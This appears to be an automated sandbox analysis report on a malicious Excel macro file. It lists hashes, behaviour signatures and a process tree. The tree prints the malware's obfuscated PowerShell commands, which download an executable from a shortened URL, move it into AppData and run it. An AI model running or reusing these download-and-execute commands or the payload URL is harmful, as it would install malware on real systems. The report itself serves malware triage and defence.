Overview

overview

10

Static

static

8

SecuriteIn...25.xls

windows7_x64

10

SecuriteIn...25.xls

windows10_x64

10

Analysis

  • max time kernel
    77s
  • max time network
    37s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    11-11-2020 01:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Exploit.Siggen2.64979.12090.18025.xls

  • Size

    75KB

  • MD5

    7ba7817848e5d33a4f5b301b075120d8

  • SHA1

    eacf413cf0b6db5ae2f36149dfd2792812a257f7

  • SHA256

    ccf9c52f4542aceff583c50226397e1f31630836f08ab40759e01eeaa5538ef4

  • SHA512

    06f71b6209b5091f6a16196757b8e3d973872f50d67641dbbd020a500baf19ef8ae018980529a841cb44ba2674e75bd1723605e6ec4a163093523fec389fe8a8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cutt.ly/XgX89zi

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.64979.12090.18025.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:336
    • C:\Windows\SysWOW64\cmd.exe
      cmd /cpowe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/XgX89zi'),'qc.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1504
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/XgX89zi'),'qc.exe')
        3⤵
        • Blacklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1720
    • C:\Windows\SysWOW64\cmd.exe
      cmd /cpowe^rshell -w 1 stARt`-slE`Ep 20; Move-Item "qc.exe" -Destination "${enV`:appdata}"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 stARt`-slE`Ep 20; Move-Item "qc.exe" -Destination "${enV`:appdata}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1460
    • C:\Windows\SysWOW64\cmd.exe
      cmd /cpowe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./qc.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./qc.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:572

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/336-1-0x00000000069D0000-0x00000000069D1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/572-63-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/572-58-0x0000000006180000-0x0000000006181000-memory.dmp

    Filesize

    4KB

    Download

  • memory/572-60-0x0000000006140000-0x0000000006141000-memory.dmp

    Filesize

    4KB

    Download

  • memory/572-11-0x000000006C660000-0x000000006CD4E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/572-75-0x0000000006390000-0x0000000006391000-memory.dmp

    Filesize

    4KB

    Download

  • memory/572-76-0x00000000063A0000-0x00000000063A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1460-13-0x000000006C660000-0x000000006CD4E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1460-57-0x00000000061C0000-0x00000000061C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1460-15-0x0000000002070000-0x0000000002071000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1460-17-0x0000000004890000-0x0000000004891000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1720-33-0x0000000006080000-0x0000000006081000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1720-20-0x0000000004600000-0x0000000004601000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1720-23-0x0000000005310000-0x0000000005311000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1720-28-0x0000000005FC0000-0x0000000005FC1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1720-49-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1720-12-0x000000006C660000-0x000000006CD4E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1720-34-0x0000000006130000-0x0000000006131000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1720-41-0x0000000006250000-0x0000000006251000-memory.dmp

    Filesize

    4KB

    Download